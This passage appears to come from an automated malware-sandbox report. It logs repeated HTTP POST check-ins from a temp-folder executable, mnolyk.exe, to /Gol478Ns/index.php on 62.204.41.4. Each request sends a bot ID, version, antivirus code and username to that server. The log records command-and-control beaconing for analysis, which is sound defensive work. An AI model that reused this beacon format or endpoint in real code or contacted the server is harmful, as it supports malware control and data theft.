                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.075440884 CET630INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        43192.168.2.54973362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:51.368597031 CET244OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.434515953 CET244INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        430192.168.2.55012062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:44.246464968 CET630OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.311366081 CET631INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        431192.168.2.55012162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:44.477396011 CET631OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.541924000 CET632INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        432192.168.2.55012262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:44.731116056 CET632OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:44.796539068 CET633INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        433192.168.2.55012362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:44.976743937 CET633OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.042740107 CET634INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        434192.168.2.55012462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:45.227690935 CET634OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.292344093 CET635INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        435192.168.2.55012562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:45.461673021 CET635OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.543565035 CET636INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        436192.168.2.55012662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:45.717299938 CET636OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:45.781358957 CET637INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        437192.168.2.55012762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:45.946491003 CET637OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.009880066 CET638INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:45 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        438192.168.2.55012862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:46.183273077 CET638OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.249476910 CET639INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        439192.168.2.55012962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:46.436569929 CET639OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.500448942 CET640INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        44192.168.2.54973462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:16:51.611738920 CET245OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:51.678834915 CET245INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:51 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        440192.168.2.55013062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:46.681000948 CET640OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.745626926 CET641INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        441192.168.2.55013162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:46.931869984 CET641OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:46.996388912 CET642INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:46 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        442192.168.2.55013262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:47.164865017 CET642OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.230132103 CET643INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        443192.168.2.55013362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:47.416110039 CET643OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.481126070 CET644INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        444192.168.2.55013462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:47.648864031 CET644OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.712028027 CET645INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        445192.168.2.55013562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:47.882066965 CET645OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:47.944685936 CET646INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:47 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        446192.168.2.55013662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:48.120124102 CET646OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:48.184925079 CET647INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:48 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        447192.168.2.55013762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 6, 2023 14:18:48.518585920 CET647OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
